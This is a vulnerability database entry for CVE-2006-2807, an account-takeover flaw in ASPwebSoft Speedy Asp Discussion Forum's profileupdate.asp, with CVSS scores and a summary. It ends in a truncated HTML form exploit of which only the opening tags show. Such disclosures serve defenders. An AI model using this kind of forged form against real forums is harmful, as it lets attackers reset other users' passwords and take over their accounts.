10
CVSSv2

CVE-2006-2807

Published: 05/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

ASPwebSoft Speedy Asp Discussion Forum allows remote malicious users to change the password of any account via a modified account id and possibly arbitrary values of the name, email, country, password, and passwordre parameters to profileupdate.asp.

Vulnerable Product Search on Vulmon Subscribe to Product

aspwebsoft speedy asp discussion forum

Exploits

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 401 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body> <div bgcolor="#000000"> <form name="InputForm" method="post" target="_blank" onsubmit="return windowconfirm("You are submitting informatio ...